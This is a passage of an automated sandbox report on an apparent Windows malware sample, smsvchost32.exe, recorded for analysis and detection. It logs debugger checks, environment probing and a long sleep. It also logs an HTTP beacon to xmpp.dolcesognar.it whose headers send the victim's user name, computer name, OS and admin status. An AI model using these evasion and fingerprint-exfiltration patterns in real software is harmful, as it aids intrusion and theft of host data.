| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQueryVolumeInformationFile, address_out = 0x779d7130 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQueryDirectoryFile, address_out = 0x779d6ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x779d7000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetQueuedCompletionStatusEx, address_out = 0x765e10f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileCompletionNotificationModes, address_out = 0x765b9dd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CancelIoEx, address_out = 0x765bf450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77986710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x775f7f60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableSRW, address_out = 0x775f7fb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x779c8d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x779cc720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CancelSynchronousIo, address_out = 0x765e05a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFinalPathNameByHandleW, address_out = 0x765c6ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\powrprof.dll | function = PowerRegisterSuspendResumeNotification, address_out = 0x74775ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWinEventHook, address_out = 0x7782fc00 |
|
1 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetStatisticsGet, address_out = 0x77492a40 |
|
1 | |
| Get Address | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | function = _OPENSSL_isservice, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetCursorInfo, address_out = 0x7784c160 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetQueueStatus, address_out = 0x7782e1b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseToolhelp32Snapshot, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Heap32First, address_out = 0x765e3f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Heap32Next, address_out = 0x765e4270 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Heap32ListFirst, address_out = 0x765e4120 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Heap32ListNext, address_out = 0x765e41d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32First, address_out = 0x765bf4d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32Next, address_out = 0x765bd1c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Thread32First, address_out = 0x765c5c50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Thread32Next, address_out = 0x765c5150 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Module32First, address_out = 0x765e44b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Module32Next, address_out = 0x765e4660 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlComputeCrc32, address_out = 0x77a2d9b0 |
|
2 | |
| Get Address | c:\windows\syswow64\iphlpapi.dll | function = GetNetworkParams, address_out = 0x71d3c4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\iphlpapi.dll | function = GetAdaptersAddresses, address_out = 0x71d35b70 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SystemFunction036, address_out = 0x74682a60 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MessageBoxW, address_out = 0x778901f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetActiveWindow, address_out = 0x77842840 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetLastActivePopup, address_out = 0x77842260 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
Window (33)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | - |
|
31 | |
| Create | - | - |
|
2 |
System (489)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Certificate Store | encoding_type = 0, flags = 98304 |
|
1 | |
| Open Certificate Store | encoding_type = 0, flags = 65536 |
|
1 | |
| Open Certificate Store | encoding_type = 0, flags = 98304 |
|
1 | |
| Add Certificate | disposition = 112721544 |
|
1 | |
| Add Certificate | disposition = 3 |
|
1 | |
| Get Computer Name | result_out = X2VS1CUM |
|
4 | |
| Sleep | duration = 98189 milliseconds (98.189 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 171062 |
|
1 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:00 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 178953 |
|
1 | |
| Get Time | type = Ticks, time = 178968 |
|
5 | |
| Get Time | type = Ticks, time = 178984 |
|
2 | |
| Get Time | type = Ticks, time = 179015 |
|
1 | |
| Get Time | type = Ticks, time = 179046 |
|
3 | |
| Get Time | type = Ticks, time = 179062 |
|
3 | |
| Get Time | type = Ticks, time = 179078 |
|
2 | |
| Get Time | type = Ticks, time = 179109 |
|
4 | |
| Get Time | type = Ticks, time = 179125 |
|
3 | |
| Get Time | type = Ticks, time = 179140 |
|
2 | |
| Get Time | type = Ticks, time = 179171 |
|
1 | |
| Get Time | type = Ticks, time = 179187 |
|
2 | |
| Get Time | type = Ticks, time = 179203 |
|
4 | |
| Get Time | type = Ticks, time = 179218 |
|
2 | |
| Get Time | type = Ticks, time = 179250 |
|
1 | |
| Get Time | type = Ticks, time = 179265 |
|
4 | |
| Get Time | type = Ticks, time = 179281 |
|
3 | |
| Get Time | type = Ticks, time = 179312 |
|
3 | |
| Get Time | type = Ticks, time = 179328 |
|
4 | |
| Get Time | type = Ticks, time = 179343 |
|
2 | |
| Get Time | type = Ticks, time = 179375 |
|
4 | |
| Get Time | type = Ticks, time = 179390 |
|
4 | |
| Get Time | type = Ticks, time = 179406 |
|
1 | |
| Get Time | type = Ticks, time = 179437 |
|
4 | |
| Get Time | type = Ticks, time = 179453 |
|
4 | |
| Get Time | type = Ticks, time = 179468 |
|
1 | |
| Get Time | type = Ticks, time = 179484 |
|
1 | |
| Get Time | type = Ticks, time = 179500 |
|
2 | |
| Get Time | type = Ticks, time = 179515 |
|
3 | |
| Get Time | type = Ticks, time = 179531 |
|
3 | |
| Get Time | type = Ticks, time = 179562 |
|
3 | |
| Get Time | type = Ticks, time = 179578 |
|
3 | |
| Get Time | type = Ticks, time = 179593 |
|
2 | |
| Get Time | type = Ticks, time = 179734 |
|
1 | |
| Get Time | type = Ticks, time = 179750 |
|
4 | |
| Get Time | type = Ticks, time = 179765 |
|
2 | |
| Get Time | type = Ticks, time = 179781 |
|
1 | |
| Get Time | type = Ticks, time = 179984 |
|
1 | |
| Get Time | type = Ticks, time = 180000 |
|
13 | |
| Get Time | type = Ticks, time = 180015 |
|
12 | |
| Get Time | type = Ticks, time = 180078 |
|
2 | |
| Get Time | type = Ticks, time = 180093 |
|
2 | |
| Get Time | type = Ticks, time = 180125 |
|
9 | |
| Get Time | type = Ticks, time = 180140 |
|
14 | |
| Get Time | type = Ticks, time = 180171 |
|
2 | |
| Get Time | type = Ticks, time = 180187 |
|
14 | |
| Get Time | type = Ticks, time = 180203 |
|
14 | |
| Get Time | type = Ticks, time = 180250 |
|
12 | |
| Get Time | type = Ticks, time = 180265 |
|
15 | |
| Get Time | type = Ticks, time = 180281 |
|
4 | |
| Get Time | type = Ticks, time = 180375 |
|
10 | |
| Get Time | type = Ticks, time = 180390 |
|
14 | |
| Get Time | type = Ticks, time = 180406 |
|
8 | |
| Get Time | type = Ticks, time = 180468 |
|
12 | |
| Get Time | type = Ticks, time = 180484 |
|
13 | |
| Get Time | type = Ticks, time = 180500 |
|
6 | |
| Get Time | type = Ticks, time = 180578 |
|
13 | |
| Get Time | type = Ticks, time = 180593 |
|
14 | |
| Get Time | type = Ticks, time = 180609 |
|
5 | |
| Get Time | type = Ticks, time = 180734 |
|
3 | |
| Get Time | type = Ticks, time = 180750 |
|
11 | |
| Get Time | type = Ticks, time = 180765 |
|
15 | |
| Get Time | type = Ticks, time = 180781 |
|
2 | |
| Get Time | type = Ticks, time = 180843 |
|
7 | |
| Get Time | type = Ticks, time = 180859 |
|
14 | |
| Get Time | type = Ticks, time = 180875 |
|
11 | |
| Get Time | type = Ticks, time = 180906 |
|
6 | |
| Get Time | type = Ticks, time = 180921 |
|
15 | |
| Get Time | type = Ticks, time = 180937 |
|
13 | |
| Get Time | type = Ticks, time = 180984 |
|
7 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:02 (UTC) |
|
2 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:03 (UTC) |
|
18 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:05 (UTC) |
|
12 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:06 (UTC) |
|
2 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:12 (UTC) |
|
3 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:13 (UTC) |
|
2 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:14 (UTC) |
|
3 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:15 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:16 (UTC) |
|
3 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
10 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
6 | |
| Get Info | type = Operating System |
|
5 |
Environment (385)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = a杤畷獧汧晱摩湫p |
|
1 | |
| Get Environment String | name = crackmeololo |
|
2 | |
| Get Environment String | - |
|
1 | |
| Get Environment String | name = NODE_CHANNEL_FD |
|
1 | |
| Get Environment String | name = USERNAME, result_out = Nd9E1FYi |
|
4 | |
| Get Environment String | name = startupObject |
|
1 | |
| Get Environment String | name = NODE_HEAPDUMP_OPTIONS |
|
1 | |
| Get Environment String | name = NODE_DEBUG |
|
3 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\Nd9E1FYi\AppData\Roaming |
|
2 | |
| Get Environment String | name = USERPROFILE, result_out = C:\Users\Nd9E1FYi |
|
13 | |
| Get Environment String | name = NODE_MODULE_CONTEXTS |
|
1 | |
| Get Environment String | name = NODE_PATH |
|
1 | |
| Get Environment String | name = vendor_id, result_out = exe_scheduler_3007 |
|
1 | |
| Get Environment String | name = mainprocessoverride, result_out = svchost.exe |
|
2 | |
| Get Environment String | name = dump_debug_to_file |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = USERNAME_REQUIRED |
|
1 | |
| Get Environment String | name = fakehostname |
|
1 | |
| Get Environment String | name = trustedcomp |
|
1 | |
| Get Environment String | name = USERDOMAIN, result_out = X2VS1CUM |
|
3 | |
| Get Environment String | name = debug_main |
|
80 | |
| Get Environment String | name = httpPortOverride |
|
1 | |
| Get Environment String | name = httpsPortOverride |
|
1 | |
| Get Environment String | name = http_proxy |
|
1 | |
| Get Environment String | name = debug_tls |
|
4 | |
| Get Environment String | name = debug_net |
|
235 | |
| Get Environment String | name = NODE_UNIQUE_ID |
|
1 | |
| Get Environment String | name = NODE_CLUSTER_SCHED_POLICY |
|
1 | |
| Get Environment String | name = temp, result_out = C:\Users\Nd9E1FYi\AppData\Local\Temp |
|
2 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\Nd9E1FYi |
|
2 | |
| Get Environment String | name = COMPUTERNAME, result_out = X2VS1CUM |
|
2 | |
| Get Environment String | name = SystemDrive, result_out = C: |
|
2 | |
| Get Environment String | name = SystemRoot, result_out = C:\Windows |
|
2 | |
| Get Environment String | name = LOGONSERVER, result_out = \\X2VS1CUM |
|
2 | |
| Get Environment String | name = TEMP, result_out = C:\Users\Nd9E1FYi\AppData\Local\Temp |
|
6 | |
| Get Environment String | name = ALLUSERSPROFILE, result_out = C:\ProgramData |
|
1 |
Debug (37)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | - |
|
33 | |
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = WMA 0 |
|
1 | ||
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = WMA 1 |
|
1 | ||
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = 3540:C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz Ignition.... |
|
1 | ||
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = JS : RUN : smsvchost32.exe, ver : 25.10.18.1117 |
|
1 |
Network Behavior
DNS (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Hostname | name_out = x2vS1cum |
|
5 | |
| Resolve Name | host = xmpp.dolcesognar.it, address_out = 109.230.199.30 |
|
1 |
TCP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 0 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 109.230.199.30:443 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0xa24 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_IP |
| Remote Address | 109.230.199.30 |
| Remote Port | 443 |
| Local Address | 0.0.0.0 |
| Local Port | 49700 |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Bind | local_address = 0.0.0.0, local_port = 49700, hint = OS assigned a local port from the dynamic client port range |
|
1 | |
| Connect | remote_address = 109.230.199.30, remote_port = 443 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34272832 |
|
1 | |
| Send | flags = NO_FLAG_SET, size_out = 302 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| Send | flags = NO_FLAG_SET, size_out = 191 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274252 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| Send | flags = NO_FLAG_SET, size_out = 335 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274252 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #2
| Information | Value |
|---|---|
| Handle | 0xa24 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_IP |
| Remote Address | 109.230.199.30 |
| Remote Port | 443 |
| Local Address | 0.0.0.0 |
| Local Port | 49700 |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Bind | local_address = 0.0.0.0, local_port = 49700, hint = OS assigned a local port from the dynamic client port range |
|
1 | |
| Connect | remote_address = 109.230.199.30, remote_port = 443 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34272832 |
|
1 | |
| Send | flags = NO_FLAG_SET, size_out = 302 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| Send | flags = NO_FLAG_SET, size_out = 191 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274252 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| Send | flags = NO_FLAG_SET, size_out = 33 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274252 |
|
1 | |
| Send | flags = NO_FLAG_SET, size_out = 818 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| Send | flags = NO_FLAG_SET, size_out = 33 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274288 |
|
3 | |
| Receive | flags = NO_FLAG_SET, size = 34274252 |
|
1 | |
| Send | flags = NO_FLAG_SET, size_out = 949 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 34274252 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Server (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Listen | local_address = 127.0.0.1, local_port = 281, queue_length = 511 |
|
1 | |
| Listen | local_address = 127.0.0.1, local_port = 402, queue_length = 511 |
|
1 |
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 518 bytes |
| Total Data Received | 24 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | xmpp.dolcesognar.it |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | xmpp.dolcesognar.it |
| Server Port | 443 |
| Data Sent | 259 |
| Data Received | 12 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Open Connection | protocol = HTTP, server_name = xmpp.dolcesognar.it, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rbody320, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = xmpp.dolcesognar.it/rbody320 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 512, size_out = 4 |
|
1 | |
| Read Response | size = 512, size_out = 0 |
|
1 | |
| Close Session | - |
|
2 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | xmpp.dolcesognar.it |
| Server Port | 443 |
| Data Sent | 259 |
| Data Received | 12 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Open Connection | protocol = HTTP, server_name = xmpp.dolcesognar.it, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rbody320, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = xmpp.dolcesognar.it/rbody320 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 512, size_out = 4 |
|
1 | |
| Read Response | size = 512, size_out = 0 |
|
1 | |
| Close Session | - |
|
2 |
Process #14: ping.exe
35
9
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\syswow64\ping.exe |
| Command Line | ping localhost -n 4 |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:24 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdb0 |
| Parent PID | 0x30c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D5C
0x
C48
0x
D60
0x
E5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00100000 | 0x001bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x004c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de3fff | Private Memory | rw |
|
|
|
- |
| ping.exe.mui | 0x00df0000 | 0x00df2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ea0000 | 0x00ea0000 | 0x00eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x0105ffff | Private Memory | rw |
|
|
|
- |
| ping.exe | 0x01110000 | 0x01118fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001120000 | 0x01120000 | 0x0511ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05120000 | 0x05456fff | Memory Mapped File | r |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x70200000 | 0x70207fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x71cd0000 | 0x71d16fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x71d20000 | 0x71d27fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x71d60000 | 0x71de3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x71ea0000 | 0x71eeefff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74330000 | 0x7434afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x774b0000 | 0x774b6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f0a0000 | 0x7f0a0000 | 0x7f19ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f1a0000 | 0x7f1a0000 | 0x7f1c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc1562ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc15630000 | 0x7dfc15630000 | 0x7ffc1562ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (20)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
10 | |
| Open | STD_OUTPUT_HANDLE | - |
|
10 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | value_name = DefaultTTL, data = 0, type = REG_NONE |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\ping.exe | base_address = 0x1110000 |
|
1 |
